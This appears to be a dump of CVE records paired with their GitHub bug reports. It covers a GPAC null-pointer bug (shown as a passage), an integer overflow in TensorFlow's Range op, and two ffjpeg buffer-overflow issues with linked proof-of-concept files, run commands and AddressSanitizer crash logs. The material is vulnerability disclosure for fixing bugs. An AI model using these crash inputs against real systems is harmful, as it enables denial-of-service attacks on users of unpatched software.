is initialized to NULL in line 12743. When the value of `prop_size` is greater than 4 ( line 12764 ), the program will allocate a memory chunk to `data2` ( line 12769 ). Otherwise, `data2` will remain NULL and will be assigned to `tag->prop_value` in line 12777. In my crash, `prop_size` was set to 1 causing `tag->prop_value` to be NULL. The `tag` is then added to `ptr->tags` for subsequent access ( line 12779). https://github.com/gpac/gpac/blob/5d68ccd1fa4a5a76cf8db31a33cfb4a2fe2bd4ad/src/isomedia/box_code_base.c#L12736-L12786 When the program executes to `xtra_box_write`, it will get a `tag` from `ptr->tags` ( line 12801 ), and pass `tag->prop_value` to the second parameter of `gf_bs_write_data` ( line 12814 ), which eventually results in `data` being NULL. Although the program judges whether `tag->prop_value` is 0 in line 12805, it does not change the execution flow of the program and the value of `tag->prop_value`. https://github.com/gpac/gpac/blob/5d68ccd1fa4a5a76cf8db31a33cfb4a2fe2bd4ad/src/isomedia/box_code_base.c#L12791-L12817 Hope my analysis will help.
Null Pointer Dereference when dealing with XtraBox
https://api.github.com/repos/gpac/gpac/issues/2081/comments
0
2022-01-28T10:38:34Z
2022-01-28T16:00:46Z
https://github.com/gpac/gpac/issues/2081
1,117,248,312
2,081
3,176
CVE-2022-23562
2022-02-04T23:15:13.843
Tensorflow is an Open Source Machine Learning Framework. The implementation of `Range` suffers from integer overflows. These can trigger undefined behavior or, in some scenarios, extremely large allocations. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/f0147751fd5d2ff23251149ebad9af9f03010732" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/52676" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/pull/51733" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qx3f-p745-w4hr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/f0147751fd5d2ff23251149ebad9af9f03010732" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/52676" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/pull/51733" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qx3f-p745-w4hr" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "688150BF-477C-48FC-9AEF-A79AC57A6DDC", "versionEndExcluding": null, "versionEndIncluding": "2.5.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "C9E69B60-8C97-47E2-9027-9598B8392E5D", "versionEndExcluding": null, "versionEndIncluding": "2.6.2", "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "2EDFAAB8-799C-4259-9102-944D4760DA2C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/tensorflow/tensorflow/issues/52676
[ "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
<em>Please make sure that this is a bug. As per our [GitHub Policy](https://github.com/tensorflow/tensorflow/blob/master/ISSUES.md), we only address code/doc bugs, performance issues, feature requests and build/installation issues on GitHub. tag:bug_template</em> **System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): all - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: n/a - TensorFlow installed from (source or binary): source - TensorFlow version (use command below): git HEAD - Python version: 3.6.8 - Bazel version (if compiling from source): 3.7.2 - GCC/Compiler version (if compiling from source): 10.3.0 - CUDA/cuDNN version: n/a - GPU model and memory: n/a You can collect some of this information using our environment capture [script](https://github.com/tensorflow/tensorflow/tree/master/tools/tf_env_collect.sh) You can also obtain the TensorFlow version with: 1. TF 1.0: `python -c "import tensorflow as tf; print(tf.GIT_VERSION, tf.VERSION)"` 2. TF 2.0: `python -c "import tensorflow as tf; print(tf.version.GIT_VERSION, tf.version.VERSION)"` **Describe the current behavior** https://github.com/tensorflow/tensorflow/blob/0b67dee3f02e2e055230ca6dd6cc7d090af72baa/tensorflow/core/ops/math_ops.cc#L1484 has undefined behaviour when size is greater than std::numeric_limits<int64_t>::max() This leads to the unit test RangeTest.testLargeStarts failing on AARCH64 where the g++ implements different behaviour from x86. On x86 the result of the cast is large and -ve, on AARCH64 it is large and +ve. Neither is incorrect as the behaviour of casting into a type that cannot hold the value is undefined. **Describe the expected behavior** The code should be written to avoid relying on undefined behaviour of the source. **[Contributing](https://www.tensorflow.org/community/contribute)** - Do you want to contribute a PR? (yes/no): yes - Briefly describe your candidate solution(if contributing): Test the variable 'size' for exceeding the greatest possible value that can be safely cast to int64_t and throw an error if found. **Standalone code to reproduce the issue** Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to Colab/Jupyter/any notebook. $ bazel test --flaky_test_attempts=3 --test_output=all --cache_test_results=no --remote_http_cache="" --remote_cache_proxy="" --noremote_accept_cached --config=nonccl --verbose_failures -- //tensorflow/python/kernel_tests:init_ops_test **Other info / logs** Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. ====================================================================== ERROR: testLargeStarts (__main__.RangeTest) RangeTest.testLargeStarts ---------------------------------------------------------------------- Traceback (most recent call last): File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/kernel_tests/init_ops_test.py", line 553, in testLargeStarts v = math_ops.range(start=-1e+38, limit=1) File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/util/traceback_utils.py", line 141, in error_handler return fn(*args, **kwargs) File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/util/dispatch.py", line 1092, in op_dispatch_handler return dispatch_target(*args, **kwargs) File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/ops/math_ops.py", line 2113, in range return gen_math_ops._range(start, limit, delta, name=name) File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/ops/gen_math_ops.py", line 7737, in _range _ops.raise_from_not_ok_status(e, name) File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/framework/ops.py", line 7131, in raise_from_not_ok_status raise core._status_to_exception(e) from None # pylint: disable=protected-access tensorflow.python.framework.errors_impl.ResourceExhaustedError: OOM when allocating tensor with shape[9223372036854775807] and type float on /job:localhost/replica:0/task:0/device:CPU:0 by allocator cpu [Op:Range]
Undefined behaviour in Range
https://api.github.com/repos/tensorflow/tensorflow/issues/52676/comments
3
2021-10-26T11:38:05Z
2021-12-17T03:28:10Z
https://github.com/tensorflow/tensorflow/issues/52676
1,036,189,142
52,676
3,177
CVE-2021-44956
2022-02-08T15:15:07.643
Two Heap based buffer overflow vulnerabilities exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23852. Issues that are in the jfif_decode function at ffjpeg/src/jfif.c (line 552) could cause a Denial of Service by using a crafted jpeg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "FC5B8CBB-E98C-4585-BE42-32D0114A7F48", "versionEndExcluding": null, "versionEndIncluding": "2021-01-01", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/rockcarry/ffjpeg/issues/43
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
**Describe** Two Heap-buffer-overflows were discovered in ffjpeg. The issues are being triggered in function jfif_decode at jfif.c:552:31 and 552:38. Found by **Cem Onat Karagun of Diesec** **System info** OS version : Ubuntu 21.04 ffjpeg Version : master [0fa4cf8a86](https://github.com/rockcarry/ffjpeg/commit/0fa4cf8a86d7f23) **Reproduce** Compile ffjpeg with address sanitizer. ``` CCFLAGS = -Wall -g -fsanitize=address ``` **POC Files:** [decode_poc1.zip](https://github.com/rockcarry/ffjpeg/files/6704516/decode_poc1.zip) [decode_poc2.zip](https://github.com/rockcarry/ffjpeg/files/6704517/decode_poc2.zip) Run POCs with the commands below. ``` $ ffjpeg -d decode_poc1 $ ffjpeg -d decode_poc2 ``` **Asan output-1:** ``` ================================================================= ==3469985==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x00000030d50c bp 0x7ffc93e360f0 sp 0x7ffc93e360e8 READ of size 4 at 0x602000000010 thread T0 #0 0x30d50b in jfif_decode /src/src/jfif.c:552:31 #1 0x3035f0 in main /src/src/ffjpeg.c:24:9 #2 0x7f3772bef564 in __libc_start_main csu/../csu/libc-start.c:332:16 #3 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd) 0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011) allocated by thread T0 here: #0 0x2cc85d in malloc (/REDACTED/ffjpeg/src/ffjpeg+0x2cc85d) #1 0x309025 in jfif_decode /src/src/jfif.c:443:21 #2 0x3035f0 in main /src/src/ffjpeg.c:24:9 #3 0x7f3772bef564 in __libc_start_main csu/../csu/libc-start.c:332:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/src/jfif.c:552:31 in jfif_decode Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa[01]fa fa fa 01 fa fa fa 01 fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: ``` **Asan output-2:** ``` ================================================================= ==3487109==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x00000030d52a bp 0x7ffe17b50930 sp 0x7ffe17b50928 READ of size 4 at 0x602000000010 thread T0 #0 0x30d529 in jfif_decode /src/src/jfif.c:552:38 #1 0x3035f0 in main /src/src/ffjpeg.c:24:9 #2 0x7fec13038564 in __libc_start_main csu/../csu/libc-start.c:332:16 #3 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd) 0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011) allocated by thread T0 here: #0 0x2cc85d in malloc (/REDACTED/ffjpeg/src/ffjpeg+0x2cc85d) #1 0x309068 in jfif_decode /src/src/jfif.c:444:21 #2 0x3035f0 in main /src/src/ffjpeg.c:24:9 #3 0x7fec13038564 in __libc_start_main csu/../csu/libc-start.c:332:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/src/jfif.c:552:38 in jfif_decode Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa[01]fa fa fa 01 fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3487109==ABORTING ```
Heap-buffer-overflows in jfif_decode() at jfif.c:552:31 and 552:38
https://api.github.com/repos/rockcarry/ffjpeg/issues/43/comments
1
2021-06-23T19:48:31Z
2021-12-07T20:05:06Z
https://github.com/rockcarry/ffjpeg/issues/43
928,585,823
43
3,178
CVE-2021-44957
2022-02-08T15:15:07.687
Global buffer overflow vulnerability exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23705. Issue is in the jfif_encode function at ffjpeg/src/jfif.c (line 708) could cause a Denial of Service by using a crafted jpeg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/44" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "FC5B8CBB-E98C-4585-BE42-32D0114A7F48", "versionEndExcluding": null, "versionEndIncluding": "2021-01-01", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/rockcarry/ffjpeg/issues/44
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
**Describe** A global-buffer-overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at jfif.c:708. Found by **Cem Onat Karagun of Diesec** **System info** OS version : Ubuntu 21.04 ffjpeg Version : master([0fa4cf8a86](https://github.com/rockcarry/ffjpeg/commit/0fa4cf8a86d7f23)) **Reproduce** Compile ffjpeg with address sanitizer. ``` CCFLAGS = -Wall -g -fsanitize=address ``` PoC file: [encode_poc1.zip](https://github.com/rockcarry/ffjpeg/files/6704528/encode_poc1.zip) Run with the following command. ``` $ ffjpeg -e encode_poc1 ``` **Asan output:** ``` ================================================================= ==3406031==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000231972 at pc 0x0000002cbc07 bp 0x7ffcef6304f0 sp 0x7ffcef62fcb8 READ of size 272 at 0x000000231972 thread T0 #0 0x2cbc06 in __asan_memcpy (/REDACTED/ffjpeg/src/ffjpeg+0x2cbc06) #1 0x30f33b in jfif_encode /src/src/jfif.c:708:5 #2 0x3029f2 in main /src/src/ffjpeg.c:30:16 #3 0x7fdfb0d3b564 in __libc_start_main csu/../csu/libc-start.c:332:16 #4 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd) 0x000000231972 is located 46 bytes to the left of global variable 'STD_HUFTAB_LUMIN_DC' defined in 'huffman.c:398:12' (0x2319a0) of size 28 0x000000231972 is located 0 bytes to the right of global variable 'STD_HUFTAB_LUMIN_AC' defined in 'huffman.c:382:12' (0x2318c0) of size 178 SUMMARY: AddressSanitizer: global-buffer-overflow (/REDACTED/ffjpeg/src/ffjpeg+0x2cbc06) in __asan_memcpy Shadow bytes around the buggy address: 0x00008003e2d0: f9 f9 f9 f9 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 0x00008003e2e0: 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00 00 01 f9 f9 0x00008003e2f0: f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 00 00 00 00 0x00008003e300: 00 00 00 00 00 00 00 00 00 00 00 00 04 f9 f9 f9 0x00008003e310: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 =>0x00008003e320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[02]f9 0x00008003e330: f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9 00 00 00 00 0x00008003e340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x00008003e350: 00 00 02 f9 f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9 0x00008003e360: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 0x00008003e370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3406031==ABORTING ``` ``` memcpy(jfif->phcac[0]->huftab, STD_HUFTAB_LUMIN_AC, MAX_HUFFMAN_CODE_LEN + 256); ```
global-buffer-overflow in function jfif_encode at jfif.c:708
https://api.github.com/repos/rockcarry/ffjpeg/issues/44/comments
4
2021-06-23T19:51:49Z
2021-12-07T20:05:15Z
https://github.com/rockcarry/ffjpeg/issues/44
928,587,983
44
3,179